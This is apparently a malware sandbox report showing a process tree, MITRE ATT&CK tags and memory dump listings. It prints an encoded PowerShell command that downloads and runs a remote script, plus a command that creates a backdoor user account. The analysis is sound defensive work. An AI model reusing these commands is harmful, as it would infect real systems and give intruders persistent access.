C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:1392
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:1092

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Suspicious use of WriteProcessMemory
PID:3656
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:2612

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:3808
- C:\Windows\system32\net.exe
  net user wgautilacc 1234
  2⤵
  PID:2976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 1234
    3⤵
    PID:3408

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/912-196-0x000001FFFF0A3000-0x000001FFFF0A5000-memory.dmp

Filesize
8KB

Download
memory/912-199-0x000001FFFF0A8000-0x000001FFFF0AA000-memory.dmp

Filesize
8KB

Download
memory/912-198-0x000001FFFF0A6000-0x000001FFFF0A8000-memory.dmp

Filesize
8KB

Download
memory/912-195-0x000001FFFF0A0000-0x000001FFFF0A2000-memory.dmp

Filesize
8KB

Download
memory/1564-132-0x000002122C673000-0x000002122C675000-memory.dmp

Filesize
8KB

Download
memory/1564-148-0x00000212474E0000-0x00000212474E1000-memory.dmp

Filesize
4KB

Download
memory/1564-143-0x000002122C678000-0x000002122C679000-memory.dmp

Filesize
4KB

Download
memory/1564-129-0x0000021246F80000-0x0000021246F81000-memory.dmp

Filesize
4KB

Download
memory/1564-125-0x000002122C640000-0x000002122C641000-memory.dmp

Filesize
4KB

Download
memory/1564-131-0x000002122C670000-0x000002122C672000-memory.dmp

Filesize
8KB

Download
memory/1564-142-0x000002122C676000-0x000002122C678000-memory.dmp

Filesize
8KB

Download
memory/1564-149-0x0000021247870000-0x0000021247871000-memory.dmp

Filesize
4KB

Download
memory/2612-236-0x0000021E24153000-0x0000021E24155000-memory.dmp

Filesize
8KB

Download
memory/2612-238-0x0000021E24158000-0x0000021E24159000-memory.dmp

Filesize
4KB

Download
memory/2612-237-0x0000021E24156000-0x0000021E24158000-memory.dmp

Filesize
8KB

Download
memory/2612-235-0x0000021E24150000-0x0000021E24152000-memory.dmp

Filesize
8KB

Download
memory/3896-201-0x00000203735A3000-0x00000203735A5000-memory.dmp

Filesize
8KB

Download
memory/3896-202-0x00000203735A6000-0x00000203735A8000-memory.dmp

Filesize
8KB

Download
memory/3896-203-0x00000203735A8000-0x00000203735AA000-memory.dmp

Filesize
8KB

Download
memory/3896-200-0x00000203735A0000-0x00000203735A2000-memory.dmp

Filesize
8KB

Download
memory/3912-166-0x000001D868460000-0x000001D868462000-memory.dmp

Filesize
8KB

Download
memory/3912-189-0x000001D868466000-0x000001D868468000-memory.dmp

Filesize
8KB

Download
memory/3912-167-0x000001D868463000-0x000001D868465000-memory.dmp

Filesize
8KB

Download
memory/3912-194-0x000001D868468000-0x000001D86846A000-memory.dmp

Filesize
8KB

Download
memory/3944-119-0x0000018F453C6000-0x0000018F453C7000-memory.dmp

Filesize
4KB

Download
memory/3944-118-0x0000018F453C5000-0x0000018F453C6000-memory.dmp

Filesize
4KB

Download
memory/3944-114-0x0000018F453C0000-0x0000018F453C2000-memory.dmp

Filesize
8KB

Download
memory/3944-117-0x0000018F453C3000-0x0000018F453C5000-memory.dmp

Filesize
8KB

Download
memory/3944-115-0x0000018F5DF40000-0x0000018F5E361000-memory.dmp

Filesize
4.1MB

Download